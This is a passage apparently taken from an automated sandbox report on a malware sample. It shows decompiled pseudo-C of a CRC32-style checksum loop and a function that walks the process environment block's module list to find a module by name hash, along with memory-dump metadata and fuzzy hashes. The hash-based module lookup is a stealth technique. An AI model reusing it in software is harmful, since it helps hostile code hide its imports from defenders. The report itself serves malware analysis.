                          							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
                          							_t75 =  &(_t76[1]);
                          							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
                          							_t70 = _t70 - 1;
                          						}
                          						_t71 = _t73;
                          						if(_t71 != 0) {
                          							do {
                          								_t28 = _t27 ^  *_t75;
                          								_t75 = _t75 + 1;
                          								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
                          								_t71 = _t71 - 1;
                          							} while (_t71 != 0);
                          						}
                          					}
                          					_t26 =  !_t27;
                          				}
                          				_a28 = _t26;
                          				asm("popad");
                          				return _t26;
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                          • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0040317B(intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				void* __ecx;
                          				intOrPtr _t17;
                          				void* _t21;
                          				intOrPtr* _t23;
                          				void* _t26;
                          				void* _t28;
                          				intOrPtr* _t31;
                          				void* _t33;
                          				signed int _t34;
                          
                          				_push(_t25);
                          				_t1 =  &_v8;
                          				 *_t1 = _v8 & 0x00000000;
                          				_t34 =  *_t1;
                          				_v8 =  *[fs:0x30];
                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                          				_t31 = _t23;
                          				do {
                          					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                          					_pop(_t26);
                          					_t35 = _t28;
                          					if(_t28 == 0) {
                          						goto L3;
                          					} else {
                          						E004032EA(_t35, _t28, 0);
                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                          						_t33 = _t33 + 0x14;
                          						if(_a4 == _t21) {
                          							_t17 = _v12;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          					L5:
                          					return _t17;
                          					L3:
                          					_t31 =  *_t31;
                          				} while (_t23 != _t31);
                          				_t17 = 0;
                          				goto L5;
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          Uniqueness

                          Uniqueness Score: -1.00%